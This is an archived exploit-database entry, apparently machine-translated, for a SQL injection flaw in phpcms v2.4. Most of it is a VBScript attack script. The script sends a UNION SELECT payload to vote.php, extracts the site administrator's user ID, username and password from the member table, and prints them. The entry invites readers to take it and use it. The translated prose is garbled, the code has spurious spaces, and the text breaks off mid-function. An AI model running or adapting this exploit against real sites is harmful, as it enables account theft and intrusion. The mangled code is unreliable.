phpcms v2. 4 SQL injection exploit exploit-vulnerability warning-the black bar safety net

2011-06-12T00:00:00
ID MYHACK58:62201130836
Type myhack58
Reporter 佚名
Modified 2011-06-12T00:00:00

Description

phpcms v2. 4 SQL injection exploit in. Old antique level. Now more 2 0 1 1 version.

Ha. Talking to. Seemingly out of the 0 9? From rural cattle VBS version EXP. There is a need to take go play.

on error resume next

Set objArgs = WScript. Arguments

dim my_http

dim my_path

dim fjhgx

print_r()

if objArgs. length = 0 then

quit_print()

End if

if objArgs(0) = null then

quit_print()

Else

my_http = objArgs(0)

End if

if objArgs(1) = null then

quit_print()

Else

my_path = objArgs(1)

End if

Set Http = CreateObject("Microsoft. XMLHTTP")

Http. Open "get","http://"& my_http&my_path&"vote. php? action=result&voteid=999999.9+UNION+ALL+SELECT+(Select concat(0x7e,0x27,userid,0x27,username,0x27,password,0x7e,0x27) FROM phpcms_member where adminid=1 limit 0,1)+,1 2,1 2,1 2,1 2,1 2,1 2,1 2,1 2,1 2,1 2,1 2,1 2--",False

Http. Send

fjhgx = Zhuanhuan(Http. responsebody)

Set Http = Nothing

if InStr(fjhgx, "voteid=~'") Then

Else

WScript. Echo "Exploit failed..."

wscript. quit 'exit

End If

fjhgx = RegExpTest("WHERE voteid=~'.*~' ",fjhgx)

fjhgx = Replace(fjhgx,"WHERE voteid=~'","")

fjhgx = Replace(fjhgx,"~' ","")

dim fjhgx_b

fjhgx_b = Split(fjhgx,"'")

WScript. Echo "* [+] UserID : "& amp; fjhgx_b(0)

WScript. Echo "* [+] Username : "& amp; fjhgx_b(1)

WScript. Echo "* [+] Password : "& amp; fjhgx_b(2)

Function print_r()

WScript. Echo"+---------------------------------------------------------------------------+"

WScript. Echo " phpcms v2. 4 SQL injection exploit"

WScript. Echo " test: Fjhgx I is rural."

WScript. Echo "mail: bugtosafe@gmail.com"

WScript. Echo " team: <http://www.wolvez.org>"

WScript. Echo"+---------------------------------------------------------------------------+"

End Function

Function quit_print()

WScript. Echo " Usage: CScript 1. vbs Url [Pre]"

WScript. Echo " Example:"

WScript. Echo " CScript 1. vbs localhost /"

WScript. Echo " CScript 1. vbs localhost /phpcms_v2. 4/"

wscript. quit 'exit

End Function

'Create conversion function for converting the encoded

Function Zhuanhuan(vIn)

strReturn = ""

For i = 1 To LenB(vIn)

ThisCharCode = AscB(MidB(vIn,i,1))

If ThisCharCode < &H80 Then

[1] [2] next